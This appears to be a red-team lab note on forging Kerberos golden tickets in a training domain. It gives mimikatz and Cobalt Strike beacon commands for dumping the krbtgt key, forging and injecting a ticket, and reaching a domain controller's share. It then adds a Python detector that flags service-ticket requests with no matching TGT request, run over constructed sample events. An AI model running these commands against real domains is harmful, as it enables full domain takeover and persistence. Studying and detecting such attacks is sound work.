Golden Ticket

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /ticket:golden.kirbi
beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\golden.kirbi
beacon> ls \\dc-2\c$
beacon> rev2self
# OR
kerberos::golden /user:<> /domain:<> /sid:<> /krbtgt:<> /ticket:golden.kirbi
kerberos::ptt golden.kirbi
/user: the username to impersonate (any user)
/domain: the FQDN of the current domain
/sid: the SID of the current domain
/krbtgt: the NTLM hash of the krbtgt account
/ticket: the filename to save the ticket as
Use /startoffset, /endin and /renewmax to control the start offset, duration and the maximum renewals (all in minutes).
TIP: Get-DomainPolicy | select -expand KerberosPolicy

With a golden ticket you are not restricted to a single service: because you hold the krbtgt key you can forge your own TGT, and with that TGT you can request a TGS for any service you want.
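The defender's side of the point above: a forged TGT is injected on the client and never requested from the KDC, so a domain controller sees TGS-REQs (event 4769) for an account with no preceding AS-REQ (event 4768). The following is an added example, not part of the original notes, that correlates the two event types over constructed, simplified log records; the MaxTicketAge value and the etype codes are assumptions taken from Windows defaults (10 hours; 0x17 for RC4, 0x12 for AES-256), not from the page.

```python
"""Flag service-ticket requests (4769) with no matching TGT request (4768).

Added example for the golden-ticket notes above; the event records below are
constructed and simplified, not real Windows Security log output.
"""
from datetime import datetime, timedelta

# Default Domain Policy MaxTicketAge is 10 hours (assumed value; read the real
# one from the domain's Kerberos policy). A TGS-REQ backed by a TGT older than
# this is anomalous because a KDC-issued TGT would already have expired.
MAX_TICKET_AGE = timedelta(hours=10)
RC4_HMAC = "0x17"   # etype logged for RC4-HMAC tickets; AES-256 is 0x12

# Constructed sample events: 4768 = TGT requested, 4769 = service ticket requested.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "account": "bfarmer",
     "client_ip": "10.10.17.231", "etype": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:00:05", "account": "bfarmer@DEV.CYBERBOTIC.IO",
     "service": "cifs/dc-2", "client_ip": "10.10.17.231", "etype": "0x12"},
    # TGT from the previous evening, service ticket 13 hours later, RC4 etype.
    {"id": 4768, "time": "2024-04-30T20:00:00", "account": "jdoe",
     "client_ip": "10.10.17.55", "etype": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:00:00", "account": "jdoe@DEV.CYBERBOTIC.IO",
     "service": "cifs/fs-1", "client_ip": "10.10.17.55", "etype": "0x17"},
    # Administrator never obtained a TGT from this KDC yet requests a service
    # ticket: the trace an injected golden ticket leaves behind.
    {"id": 4769, "time": "2024-05-01T09:30:00", "account": "Administrator@DEV.CYBERBOTIC.IO",
     "service": "cifs/dc-2", "client_ip": "10.10.17.231", "etype": "0x12"},
]


def _norm(account):
    """4768 logs 'user', 4769 logs 'user@REALM'; compare them case-insensitively."""
    return account.split("@")[0].lower()


def _ts(value):
    return datetime.fromisoformat(value)


def find_suspicious_tgs(events, max_ticket_age=MAX_TICKET_AGE, expect_aes=True):
    """Return a list of (event, reasons) for 4769 events that look like they were
    presented with a TGT the KDC never issued. Events are processed in time order."""
    last_tgt = {}   # (account, client_ip) -> time of most recent 4768
    findings = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        key = (_norm(ev["account"]), ev["client_ip"])
        when = _ts(ev["time"])
        if ev["id"] == 4768:
            last_tgt[key] = when
            continue
        if ev["id"] != 4769:
            continue
        reasons = []
        tgt_time = last_tgt.get(key)
        if tgt_time is None:
            reasons.append("no TGT request (4768) seen for this account/host")
        elif when - tgt_time > max_ticket_age:
            reasons.append("last TGT request older than MaxTicketAge")
        if expect_aes and ev["etype"] == RC4_HMAC:
            reasons.append("RC4 service ticket in a domain that should use AES")
        if reasons:
            findings.append((ev, reasons))
    return findings


if __name__ == "__main__":
    for ev, reasons in find_suspicious_tgs(SAMPLE_EVENTS):
        print(ev["time"], ev["account"], ev.get("service"), "->", "; ".join(reasons))
```

Two caveats when running this against real logs: 4768 and 4769 are written by whichever DC handled each request, so the events must be collected from every DC before correlating, and long-lived interactive sessions will trip the MaxTicketAge check unless renewals are accounted for. The "no 4768" signal survives even when the forger matches the ticket lifetime to the domain policy, which is why it is the check to keep.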